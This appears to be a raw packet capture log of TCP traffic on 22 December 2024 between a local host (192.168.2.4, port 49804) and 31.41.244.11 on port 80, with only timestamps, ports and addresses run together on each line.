                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.159192085 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.159238100 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.160175085 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.160228014 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.160276890 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.160326958 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.161290884 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.161346912 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.161410093 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.161462069 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.162467003 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.162519932 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.162579060 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.162622929 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.163603067 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.163646936 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.163727999 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.163770914 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.164673090 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.164710045 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.164717913 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.164752960 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.165797949 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.165852070 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.165921926 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.165968895 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.166985035 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.167049885 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.167093992 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.167135000 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.168071032 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.168113947 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.168133020 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.168174982 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.169117928 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.169161081 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.169231892 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.169275045 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.170258045 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.170310020 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.170375109 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.170425892 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.171382904 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.171437025 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.171503067 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.171549082 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.172492027 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.172540903 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.172610998 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.172658920 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.173758030 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.173794985 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.173816919 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.173835039 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.174709082 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.174760103 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.174834013 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.174884081 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.175858021 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.175908089 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.176057100 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.176101923 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.176937103 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.176985025 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.177131891 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.177179098 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.178112984 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.178164959 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.178210974 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.178256989 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.179204941 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.179250002 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.179284096 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.179327011 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.180310011 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.180366993 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.180422068 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.180469036 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.181421995 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.181473017 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.181581020 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.181627035 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.182590961 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.182640076 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.182645082 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.182688951 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.183675051 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.183722019 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.183793068 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.183892965 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.184926033 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.184963942 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.184984922 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.185004950 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.185909986 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.185956955 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.186024904 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.186073065 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.187079906 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.187128067 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.187213898 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.187262058 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.188111067 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.188157082 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.188241005 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.188285112 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.189255953 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.189304113 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.189410925 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.189456940 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.190373898 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.190423012 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.190490007 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.190534115 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.191514015 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.191560984 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.191637039 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.191683054 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.192600012 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.192647934 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.192715883 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.192758083 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.193722963 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.193770885 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.193852901 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.193942070 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.194824934 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.195004940 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.196089029 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.196125984 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.197037935 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.197177887 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.197483063 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.198168039 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.198224068 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.198462009 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.198513031 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.199287891 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.199342966 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.199420929 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.199466944 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.200407028 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.200455904 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.200578928 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.200628996 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.201553106 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.201601028 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.201687098 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.201730967 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.202672958 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.202742100 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.202745914 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.202796936 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.203783989 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.203830004 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.203902006 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.203960896 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.204946995 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.204998016 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.205044031 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.205101013 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.206041098 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.206090927 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.206162930 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.206207991 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.207146883 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.207199097 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.207247972 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.207294941 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.208256960 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.208302975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.208369017 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.208410978 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.209327936 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.209373951 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.209456921 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.209501028 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.210450888 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.210491896 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.210573912 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.210617065 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.211605072 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.211659908 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.211765051 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.211807013 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.212702990 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.212748051 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.212814093 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.212857962 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.213795900 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.213845015 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.213911057 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.214004993 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.214972019 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.215022087 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.215102911 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.215158939 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.216053009 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.216116905 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.349787951 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.349853992 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.349948883 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.349996090 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.350240946 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.350287914 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.350342989 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.350387096 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.351339102 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.351387024 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.351397038 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.351435900 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.352423906 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.352473021 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.352533102 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.352588892 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.353533983 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.353583097 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.353598118 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.353641033 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.354667902 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.354713917 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.354773998 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.354820013 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.355775118 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.355820894 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.355890036 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.355938911 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.356905937 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.356951952 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.357036114 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.357083082 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.358027935 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.358062983 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.358127117 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.358170986 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.359107971 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.359149933 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.359297037 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.359342098 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.360233068 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.360274076 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.360445976 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.360491037 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.361449003 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.361485958 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.361498117 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.361531973 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.362495899 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.362539053 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.362689972 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.362785101 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.363575935 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.363624096 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.363686085 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.363729000 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.364721060 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.364768028 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.364900112 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.364943981 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.365856886 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.365900993 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.366045952 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.366089106 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.366929054 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.366976023 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.367130995 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.367176056 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.368065119 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.368109941 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.368206978 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.368257999 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.369182110 CET804980431.41.244.11192.168.2.4
